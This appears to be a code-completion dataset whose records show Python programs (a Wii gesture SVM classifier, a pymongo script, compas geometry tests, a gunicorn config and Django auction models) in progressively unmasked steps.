gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n <mask token>\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n <mask token>\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-3": "<mask token>\n\n\nclass WiiGestureClassifier:\n <mask token>\n\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return '\\na gesture has no trained samples'\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n <mask token>\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-4": "import numpy as np\nfrom scipy import fft\nimport math\nfrom sklearn import svm\nfrom activity_recognition import WiiGesture\n\n\nclass WiiGestureClassifier:\n \"\"\"\n This class uses the FFT on the average of all three sensor values\n to provide the training data for the SVM\n\n Three good distinguishable gestures are:\n Fast circle movement\n Still, doing nothing\n Fast swing movement from behind the shoulder (like a whip)\n \"\"\"\n\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return '\\na gesture has no trained samples'\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture\n .trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n\n def parseDataset(self, dataSet):\n x = []\n y = []\n z = []\n avg = []\n for values in dataSet:\n x.append(values[0] - 512)\n y.append(values[1] - 512)\n z.append(values[2] - 512)\n avg.append((values[0] - 512 + values[1] - 512 + values[2] - 512\n ) / 3)\n return avg\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.\n trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.\n trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in\n parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for\n l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False\n",
"step-5": "import numpy as np\nfrom scipy import fft\nimport math\nfrom sklearn import svm\nfrom activity_recognition import WiiGesture\n\n\nclass WiiGestureClassifier():\n \"\"\"\n This class uses the FFT on the average of all three sensor values\n to provide the training data for the SVM\n\n Three good distinguishable gestures are:\n Fast circle movement\n Still, doing nothing\n Fast swing movement from behind the shoulder (like a whip)\n \"\"\"\n def __init__(self):\n super(self.__class__, self).__init__()\n\n def train(self, gestureList):\n self.gestureList = gestureList\n self.parsedGestureList = []\n self.parseArrays(self.gestureList)\n if self.checkListForEmpty():\n return \"\\na gesture has no trained samples\"\n self.minlen = self.calcMinLength()\n self.cutGestureList()\n self.getFrequencies()\n self.buildClassifier()\n\n\n def parseArrays(self, data):\n parsedData = []\n for gesture in data:\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet)\n for dataSet in gesture.trainingsData]\n parsedGesture.trainingsData = parsedData\n self.parsedGestureList.append(parsedGesture)\n\n def parseDataset(self, dataSet):\n x = []\n y = []\n z = []\n avg = []\n #Use the difference from default sensor value\n for values in dataSet:\n x.append(values[0]-512)\n y.append(values[1]-512)\n z.append(values[2]-512)\n avg.append((values[0]-512 + values[1]-512 + values[2]-512) / 3)\n return avg\n\n def calcMinLength(self):\n all = []\n for gesture in self.parsedGestureList:\n all += gesture.trainingsData\n minlen = min([len(x) for x in all])\n return minlen\n\n def cutGestureList(self):\n for gesture in self.parsedGestureList:\n gesture.trainingsData = [l[:self.minlen] for l in gesture.trainingsData]\n\n def getFrequencies(self):\n for gesture in self.parsedGestureList:\n gesture.frequencies = [\n np.abs(fft(l) / len(l))[1:len(l) / 2] for l in gesture.trainingsData]\n\n def buildClassifier(self):\n self.c = svm.SVC()\n count = 0\n categories = []\n trainingData = []\n for gesture in self.parsedGestureList:\n categories += [count] * len(gesture.frequencies)\n trainingData += gesture.frequencies\n count += 1\n try:\n self.c.fit(trainingData, categories)\n except ValueError:\n return 'More traininsdata for some gestures required'\n\n def classify(self, gesture):\n parsedData = []\n parsedGesture = WiiGesture(gesture.name)\n parsedData = [self.parseDataset(dataSet) for dataSet in gesture.trainingsData]\n parsedGesture.trainingsData = parsedData\n if len(parsedGesture.trainingsData[0]) < self.minlen:\n missingValues = self.minlen - len(parsedGesture.trainingsData[0])\n for x in range(missingValues):\n parsedGesture.trainingsData[0].append(0)\n parsedGesture.trainingsData = [l[:self.minlen] for l in parsedGesture.trainingsData]\n parsedGesture.frequencies = [np.abs(fft(l) / len(l))[1:len(l) / 2] for l in parsedGesture.trainingsData]\n return self.c.predict(parsedGesture.frequencies[0])\n\n def checkListForEmpty(self):\n #checks for empty gestures and exits code\n if len(self.parsedGestureList) <= 0:\n return True\n for gesture in self.parsedGestureList:\n if len(gesture.trainingsData) <= 0:\n return True\n else:\n return False",
"step-ids": [
7,
8,
10,
13,
14
]
}
|
[
7,
8,
10,
13,
14
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(mydoc)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
myclient = pymongo.MongoClient('mongodb://localhost:27017/')
mydb = myclient['mydatabase']
mycol = mydb['customers']
mydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',
'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]
x = mycol.insert_many(mydict)
myquery = {'name': 'Albert'}
mydoc = mycol.find()
print(mydoc)
<|reserved_special_token_1|>
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/')
mydb = myclient['mydatabase']
mycol = mydb['customers']
mydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',
'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]
x = mycol.insert_many(mydict)
myquery = {'name': 'Albert'}
mydoc = mycol.find()
print(mydoc)
<|reserved_special_token_1|>
import pymongo
myclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object
mydb = myclient['mydatabase'] #Create a database
mycol = mydb['customers'] #Create a collection into my mydatabase
mydict = [{"name": "Eric", "address": "Highway 37"}, {"name": "Albert", "address": "Highway 37"}, {"name": "Ivan", "address": "Highway 37"}]
x = mycol.insert_many(mydict)
myquery = {'name':'Albert'}
mydoc = mycol.find()
print(mydoc)
|
flexible
|
{
"blob_id": "6c6026a7ff0345c37e62de7c0aac0ee3bcde2c82",
"index": 5879,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(mydoc)\n",
"step-3": "<mask token>\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-4": "import pymongo\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/')\nmydb = myclient['mydatabase']\nmycol = mydb['customers']\nmydict = [{'name': 'Eric', 'address': 'Highway 37'}, {'name': 'Albert',\n 'address': 'Highway 37'}, {'name': 'Ivan', 'address': 'Highway 37'}]\nx = mycol.insert_many(mydict)\nmyquery = {'name': 'Albert'}\nmydoc = mycol.find()\nprint(mydoc)\n",
"step-5": "import pymongo\n\nmyclient = pymongo.MongoClient('mongodb://localhost:27017/') #We create the database object\n\nmydb = myclient['mydatabase'] #Create a database\n\nmycol = mydb['customers'] #Create a collection into my mydatabase\n\nmydict = [{\"name\": \"Eric\", \"address\": \"Highway 37\"}, {\"name\": \"Albert\", \"address\": \"Highway 37\"}, {\"name\": \"Ivan\", \"address\": \"Highway 37\"}]\n\nx = mycol.insert_many(mydict)\n\nmyquery = {'name':'Albert'}\n\nmydoc = mycol.find()\n\nprint(mydoc)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from compas.geometry import Line
# This import is used to test __repr__.
from compas.geometry import Point # noqa: F401
def test_line():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line.start == p1
assert line.end == p2
def test_equality():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert (p1, p2) == line
assert line == Line(p1, p2)
assert line != (p2, p1)
assert line != 1
def test___repr__():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line == eval(repr(line))
def test___getitem__():
p1 = [0, 0, 0]
p2 = [1, 0, 0]
line = Line(p1, p2)
assert line[0] == p1
assert line[1] == p2
|
normal
|
{
"blob_id": "03629e62b11e66eeb0e111fee551c75c8463cbb8",
"index": 1059,
"step-1": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\n<mask token>\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-2": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\n<mask token>\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-3": "<mask token>\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-4": "from compas.geometry import Line\nfrom compas.geometry import Point\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-5": "from compas.geometry import Line\n\n# This import is use to test __repr__.\nfrom compas.geometry import Point # noqa: F401\n\n\ndef test_line():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line.start == p1\n assert line.end == p2\n\n\ndef test_equality():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert (p1, p2) == line\n assert line == Line(p1, p2)\n assert line != (p2, p1)\n assert line != 1\n\n\ndef test___repr__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line == eval(repr(line))\n\n\ndef test___getitem__():\n p1 = [0, 0, 0]\n p2 = [1, 0, 0]\n line = Line(p1, p2)\n assert line[0] == p1\n assert line[1] == p2\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import os
bind = "0.0.0.0:" + str(os.environ.get("MAESTRO_PORT", 5005))
workers = os.environ.get("MAESTRO_GWORKERS", 2)
|
normal
|
{
"blob_id": "818e6842d4a1f8978ec14bca06981ec933c00376",
"index": 6280,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nbind = '0.0.0.0:' + str(os.environ.get('MAESTRO_PORT', 5005))\nworkers = os.environ.get('MAESTRO_GWORKERS', 2)\n",
"step-3": "import os\nbind = '0.0.0.0:' + str(os.environ.get('MAESTRO_PORT', 5005))\nworkers = os.environ.get('MAESTRO_GWORKERS', 2)\n",
"step-4": "import os\n\nbind = \"0.0.0.0:\" + str(os.environ.get(\"MAESTRO_PORT\", 5005))\nworkers = os.environ.get(\"MAESTRO_GWORKERS\", 2)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Product(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProductCategory(models.Model):
<|reserved_special_token_0|>
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name='seller')
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name='starting bid')
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=
False)
product_category = models.ForeignKey(ProductCategory, verbose_name=
'product category')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
name = models.CharField(max_length=20)
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name='seller')
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name='starting bid')
description = models.TextField(max_length=280)
timestamp = models.DateTimeField(auto_now_add=timezone.now(), auto_now=
False)
product_category = models.ForeignKey(ProductCategory, verbose_name=
'product category')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.name)
class AuctionStatus(models.Model):
name = models.CharField(max_length=20)
version = IntegerVersionField()
class Meta:
unique_together = 'name',
def __unicode__(self):
return smart_unicode(self.name)
class Auction(models.Model):
title = models.CharField(max_length=20)
current_price = models.DecimalField(max_digits=10, decimal_places=2,
default=0, null=True, blank=True, verbose_name='current bid')
updated_time = models.DateTimeField(auto_now_add=False, auto_now=
timezone.now())
end_time = models.DateTimeField(verbose_name='end time')
product = models.OneToOneField(Product, related_name='product')
status = models.ForeignKey(AuctionStatus, verbose_name='auction status')
version = IntegerVersionField()
class Meta:
unique_together = 'title',
ordering = ['end_time']
def __unicode__(self):
return smart_unicode(self.title)
@classmethod
def fetchActiveAuctions(cls):
try:
queryset = cls.objects.filter(status_id=1).order_by('-end_time'
).reverse()
return queryset
except IndexError:
return None
@classmethod
def getAuctionByID(cls, aucid):
try:
return cls.objects.get(id=aucid, status_id=1)
except IndexError:
return None
@classmethod
def getAuctionByCategory(cls, catid):
try:
prodcat = Product.objects.filter(product_category=catid)
queryset = Auction.objects.filter(product_id=prodcat, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getAuctionByOwner(cls, ownerid):
try:
myprod = Product.objects.filter(seller_id=ownerid)
queryset = Auction.objects.filter(product_id=myprod, status_id=1)
return queryset
except IndexError:
return None
@classmethod
def getOwnerByAuctionID(cls, aucid):
try:
queryset = Auction.objects.get(id=aucid, status_id=1)
myprod = Product.objects.get(id=queryset.product_id)
seller = myprod.seller
return seller
except IndexError:
return None
@classmethod
def getAuctionByProductID(cls, product_id):
try:
queryset = Auction.objects.get(product=product_id, status_id=1)
return queryset
except IndexError:
return None
class Bidder(models.Model):
contender = models.ForeignKey(User, related_name='buyer', verbose_name=
'contender')
auctions = models.ManyToManyField(Auction, related_name='auctions',
through='AuctionBidder')
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.contender)
class Meta:
ordering = ['contender']
class AuctionBidder(models.Model):
unique_bidder = models.ForeignKey(Bidder, related_name='unique_bidder')
auc = models.ForeignKey(Auction, related_name='unique_auction')
bid_amount = models.DecimalField(max_digits=10, decimal_places=2,
verbose_name='bid amount')
bid_time = models.DateTimeField(auto_now_add=False, auto_now=timezone.now()
)
version = IntegerVersionField()
def __unicode__(self):
return smart_unicode(self.auc)
class Meta:
ordering = ['bid_time']
<|reserved_special_token_1|>
from django.db import models
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from django.core.validators import MinValueValidator
from django.utils import timezone
from concurrency.fields import IntegerVersionField
class ProductCategory(models.Model):
name = models.CharField(max_length=20)
class Meta:
unique_together = (("name"),)
def __unicode__(self):
return smart_unicode(self.name)
class Product(models.Model):
name = models.CharField(max_length=20)
seller = models.ForeignKey(User, verbose_name="seller")
initial_price = models.DecimalField(max_digits=10, decimal_places=2,
validators=[MinValueValidator(0)], verbose_name="starting bid")
description = models.TextField(max_length=280)
